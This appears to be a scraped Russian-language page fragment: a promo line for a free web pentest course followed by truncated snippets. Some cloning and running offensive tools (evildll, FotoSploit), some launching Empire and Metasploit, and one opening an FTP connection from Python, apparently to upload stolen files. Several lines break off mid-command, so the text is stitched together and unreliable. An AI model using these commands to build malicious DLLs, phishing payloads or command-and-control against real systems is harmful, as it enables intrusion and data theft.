Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе
# git clone https://github.com/thelinuxchoice/evildll.git
# apt-get install mingw-w64
# cd evildll/
# chmod +x evildll.sh
# bash...
# git clone https://github.com/Cesar-Hack-Gray/FotoSploit.git
# mv FotoSploit /root/
# cd FotoSploit
# chmod +x install.sh FotoSploit
# bash install.sh
# ./FotoSploit
pkg...
cd Empire
./empire
service postgresql start
msfconsole
import os.path
import getpass
from ftplib import FTP
import random
con = FTP("хост","логин","пароль")